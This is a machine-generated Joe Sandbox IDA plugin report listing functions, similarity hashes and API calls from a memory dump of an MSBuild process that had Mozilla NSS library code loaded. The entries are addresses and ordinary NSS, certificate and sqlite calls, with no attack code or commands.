Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: fbc39f6fdc937d8471ed722e224550ff7d0331b215b5ee757b22e4c1386d5dba
Instruction ID: 162ca5504ab7d9d8e2f9841e825fb9a52333393fee75183b0294888c3fbb4c27
Opcode Fuzzy Hash: fbc39f6fdc937d8471ed722e224550ff7d0331b215b5ee757b22e4c1386d5dba
Instruction Fuzzy Hash: 8F210170601194ABDB509B259D99F9F3BB5EB4331DF494039E809D7B12EB309A48CBE2

Function 6CB66DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6CB67D8F,6CB67D8F,?,?), ref: 6CB66DC8

Part of subcall function 6CBBFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CBBFE08
Part of subcall function 6CBBFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CBBFE1D
Part of subcall function 6CBBFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CBBFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CB67D8F,?,?), ref: 6CB66DD5

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC88FA0,00000000,?,?,?,?,6CB67D8F,?,?), ref: 6CB66DF7

Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB66E35

Part of subcall function 6CBBFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CBBFE29
Part of subcall function 6CBBFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CBBFE3D
Part of subcall function 6CBBFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CBBFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB66E4C

Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC88FE0,00000000), ref: 6CB66E82

Part of subcall function 6CB66AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CB6B21D,00000000,00000000,6CB6B219,?,6CB66BFB,00000000,?,00000000,00000000,?,?,?,6CB6B21D), ref: 6CB66B01
Part of subcall function 6CB66AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CB66B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB66F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB66F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC88FE0,00000000), ref: 6CB66F6B
PR_SetError.NSS3(FFFFE005,00000000,6CB67D8F,?,?), ref: 6CB66FE1

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: eb92cb0f5857d3a2b8eeb7281f3845a9d9c925e8c8722221f0c35ddb91247d78
Instruction ID: 0f0b0f7d2afeacdd5b0e0d7c777250845a884eec47d704546addd6321d862271
Opcode Fuzzy Hash: eb92cb0f5857d3a2b8eeb7281f3845a9d9c925e8c8722221f0c35ddb91247d78
Instruction Fuzzy Hash: FC717071E106869FDB00CF16CD50BAABBA8FF94308F154229E858DBB11F770E994CB91

Function 6CBAADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE10
EnterCriticalSection.KERNEL32(?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6CB8D079,00000000,00000001), ref: 6CBAAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE7F
TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEF1
free.MOZGLUE(6CB8CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?), ref: 6CBAAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAF30

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 1fc454fd05b38446fd4fefb5bc7d3cbeb31054ac4cedae9ce7c8df11f86ffa49
Instruction ID: 9aa288bee52e652f1334a50b1e38e1b837904e38614658334264f0f47982e588
Opcode Fuzzy Hash: 1fc454fd05b38446fd4fefb5bc7d3cbeb31054ac4cedae9ce7c8df11f86ffa49
Instruction Fuzzy Hash: 6451BFB1A04642AFDB04DF65D884A59B7B4FF08318F144264D84897E01E732F965CFE2

Function 6CB84CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6CB8AB7F,?,00000000,?), ref: 6CB84CB4
EnterCriticalSection.KERNEL32(0000001C,?,6CB8AB7F,?,00000000,?), ref: 6CB84CC8
TlsGetValue.KERNEL32(?,6CB8AB7F,?,00000000,?), ref: 6CB84CE0
EnterCriticalSection.KERNEL32(?,?,6CB8AB7F,?,00000000,?), ref: 6CB84CF4
PL_HashTableLookup.NSS3(?,?,?,6CB8AB7F,?,00000000,?), ref: 6CB84D03
PR_Unlock.NSS3(?,00000000,?), ref: 6CB84D10

Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4

PR_Now.NSS3(?,00000000,?), ref: 6CB84D26

Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CB84D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CB84DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CB84E02

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 8ab55add7fbf30b6943a4da2ffbc971e9ce7592ad4c6031ff4c3dd9f9f68911b
Instruction ID: c8d7d24f1016268060c56bfed4d3686e2d08f6222f3f5c892508d127ff335500
Opcode Fuzzy Hash: 8ab55add7fbf30b6943a4da2ffbc971e9ce7592ad4c6031ff4c3dd9f9f68911b
Instruction Fuzzy Hash: 7841A7B5E002559BEB119F68EC5096A77BCFF05219F054170EC1887712FB31E928CBA2

Function 6CB62E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB62CDA,?,00000000), ref: 6CB62E1E

Part of subcall function 6CBBFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB69003,?), ref: 6CBBFD91
Part of subcall function 6CBBFD80: PORT_Alloc_Util.NSS3(A4686CBC,?), ref: 6CBBFDA2
Part of subcall function 6CBBFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CBC,?,?), ref: 6CBBFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CB62E33

Part of subcall function 6CBBFD80: free.MOZGLUE(00000000,?,?), ref: 6CBBFDD1

TlsGetValue.KERNEL32 ref: 6CB62E4E
EnterCriticalSection.KERNEL32(?), ref: 6CB62E5E
PL_HashTableLookup.NSS3(?), ref: 6CB62E71
PL_HashTableRemove.NSS3(?), ref: 6CB62E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6CB62E96
PR_Unlock.NSS3 ref: 6CB62EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB62EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB62EC5

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 019fb9081bfe2ba5ff4f1623424a12c1f1497a8dacacf1a13ff5ff3045a5a385
Instruction ID: b1871fcd25c047a303b9cb17e8d47d6e5cc09e4bd39a545290deeba907702b50
Opcode Fuzzy Hash: 019fb9081bfe2ba5ff4f1623424a12c1f1497a8dacacf1a13ff5ff3045a5a385
Instruction Fuzzy Hash: F5212976E00141ABEF111B69ED09AAF3B74EB5234DF040431ED1896B11FB32D669D6A3

Function 6CAECEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CAEB999), ref: 6CAECFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CAEB999), ref: 6CAED02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CAEB999), ref: 6CAED041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CAEB999), ref: 6CC3972B

Strings

database corruption, xrefs: 6CAECFE7, 6CAED013, 6CAED028, 6CAED039, 6CAED03E, 6CC39786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAECFDD, 6CAED00E, 6CAED022, 6CAED033, 6CC39780
%s at line %d of [%.10s], xrefs: 6CAECFEC, 6CAED018, 6CAED029, 6CAED03F, 6CC3978B

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: bfd740b2faec58ac438b76b22ef92b12bed73ece6da10d95972f721dd86f3641
Instruction ID: bf31e710d6690350b70fbb334d78c2e421318d8fd9baae0c15a859257ce60b2b
Opcode Fuzzy Hash: bfd740b2faec58ac438b76b22ef92b12bed73ece6da10d95972f721dd86f3641
Instruction Fuzzy Hash: 8D613871A042508BD310CF29C840BA7BBF1EF85318F18816DE4499BB82E376D947C7E1

Function 6CBACC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CBACD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CBACE16
PR_SetError.NSS3(00000000,00000000), ref: 6CBAD079

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 66d3e38a0f63be61c66a106a14d399910cfb478ecc6688a41832dba9a621a824
Instruction ID: ae5bf2c2845ee8cf87b07cd1c6a586bd4c18fd0a4052c551b7deb8c5c78d9d19
Opcode Fuzzy Hash: 66d3e38a0f63be61c66a106a14d399910cfb478ecc6688a41832dba9a621a824
Instruction Fuzzy Hash: 59C190B1A042599FDB20CF65DC80BDAB7B4FB48308F1441A8D88897741E776EE96CF91

Function 6CB62C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(C7299DC0), ref: 6CB62C5D

Part of subcall function 6CBC0D30: calloc.MOZGLUE ref: 6CBC0D50
Part of subcall function 6CBC0D30: TlsGetValue.KERNEL32 ref: 6CBC0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CB62C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB62CE0

Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB62CDA,?,00000000), ref: 6CB62E1E
Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB62E33
Part of subcall function 6CB62E00: TlsGetValue.KERNEL32 ref: 6CB62E4E
Part of subcall function 6CB62E00: EnterCriticalSection.KERNEL32(?), ref: 6CB62E5E
Part of subcall function 6CB62E00: PL_HashTableLookup.NSS3(?), ref: 6CB62E71
Part of subcall function 6CB62E00: PL_HashTableRemove.NSS3(?), ref: 6CB62E84
Part of subcall function 6CB62E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB62E96
Part of subcall function 6CB62E00: PR_Unlock.NSS3 ref: 6CB62EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB62D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CB62D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CB62D3F
free.MOZGLUE(00000000), ref: 6CB62D73
CERT_DestroyCertificate.NSS3(?), ref: 6CB62DB8
free.MOZGLUE ref: 6CB62DC8

Part of subcall function 6CB63E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB63EC2
Part of subcall function 6CB63E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB63ED6
Part of subcall function 6CB63E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB63EEE
Part of subcall function 6CB63E60: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CB63F02
Part of subcall function 6CB63E60: PL_FreeArenaPool.NSS3 ref: 6CB63F14
Part of subcall function 6CB63E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB63F27

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 0954c0210b0eb70af06408d7f7e2d8edc6114245c212698e1177572514ab9d21
Instruction ID: 2b8817d02e7fae152445717093e3b1c6b0f42e6073b7d49281233d414e6d36a4
Opcode Fuzzy Hash: 0954c0210b0eb70af06408d7f7e2d8edc6114245c212698e1177572514ab9d21
Instruction Fuzzy Hash: 8851BE71A042619BEB119F6ADC89B5B77E5EF84348F140428EC5993A50EB31E8158B93

Function 6CBC4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CBC536F,00000022,?,?,00000000,?), ref: 6CBC4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CBC4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CBC4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CBC4FAE
free.MOZGLUE(?), ref: 6CBC4FC8

Strings

%s=%c%s%c, xrefs: 6CBC4FA9
%s=%s, xrefs: 6CBC4F89

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: 36f3e40175c22fe167fff2f3d7fce3bdf04b4c39843e0699c6f65f331b87d37f
Instruction ID: c16ca08c5e7f4399a89fda72f243a1b2caebe6c91d38664f536781cb905b0861
Opcode Fuzzy Hash: 36f3e40175c22fe167fff2f3d7fce3bdf04b4c39843e0699c6f65f331b87d37f
Instruction Fuzzy Hash: 66513871B051C78BEF05CAA984907FF7BF5DF46308F1A8125E898A7A41D3358A058FA3

Function 6CB78CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CB8124D,00000001), ref: 6CB78D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CB8124D,00000001), ref: 6CB78D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CB8124D,00000001), ref: 6CB78D73
PR_Unlock.NSS3(?,?,?,?,?,6CB8124D,00000001), ref: 6CB78D8C

Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4

PR_Unlock.NSS3(?,?,?,?,?,6CB8124D,00000001), ref: 6CB78DBA

Strings

KRAM, xrefs: 6CB78D3E
KRAM, xrefs: 6CB78CF9

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: ee62025cfb6097e9d7290dd0e99f2dda20325b652edf361e8f1bc986d9ca0e0f
Instruction ID: 59069c0fc9584cc54fa95d7cd028953242bc9c08006014fbc30c86c3a5fb6608
Opcode Fuzzy Hash: ee62025cfb6097e9d7290dd0e99f2dda20325b652edf361e8f1bc986d9ca0e0f
Instruction Fuzzy Hash: B0217CB1A046518FCB10EF78C58455ABBF0FF45318F15896EDCA897701E731E841CBA2

Function 6CB9ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CB9ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB9AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9AD23

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB9AD39

Strings

(CK_INVALID_HANDLE), xrefs: 6CB9AD1C
C_MessageDecryptFinal, xrefs: 6CB9ACE1
hSession = 0x%x, xrefs: 6CB9ACFE, 6CB9AD0E

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: 718631b9e0d0b8385f1aba40aa53ead0c992fc6079ad3bfacd096142b9f79bed
Instruction ID: 62ddb74bc30a1f79b07ee11b3821af3af5567c20577a08383defc27df53cc4ee
Opcode Fuzzy Hash: 718631b9e0d0b8385f1aba40aa53ead0c992fc6079ad3bfacd096142b9f79bed
Instruction Fuzzy Hash: B9212670A011A49FDB109B64DC98BAF37B5EF4331EF054035E40A97A61EB309E49CBA2

Function 6CB9A550 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptFinal), ref: 6CB9A576
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB9A5A4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9A5B3

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

